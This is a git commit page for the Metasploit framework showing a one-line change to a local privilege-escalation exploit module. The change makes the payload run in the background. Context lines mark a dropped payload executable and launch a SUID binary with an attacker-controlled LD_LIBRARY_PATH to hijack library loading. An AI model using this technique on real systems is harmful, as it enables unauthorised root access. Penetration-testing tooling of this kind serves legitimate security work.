Background payload execution

GSoC/Meterpreter_Web_Console
Brendan Coles 2018-09-17 08:42:04 +00:00
parent c8906f8772
commit 83039781de
1 changed files with 1 additions and 1 deletions

View File

@ -245,6 +245,6 @@ class MetasploitModule < Msf::Exploit::Local
cmd_exec "chmod +x #{payload_path}"
print_status 'Executing payload...'
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path}"
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path} & echo "
end
end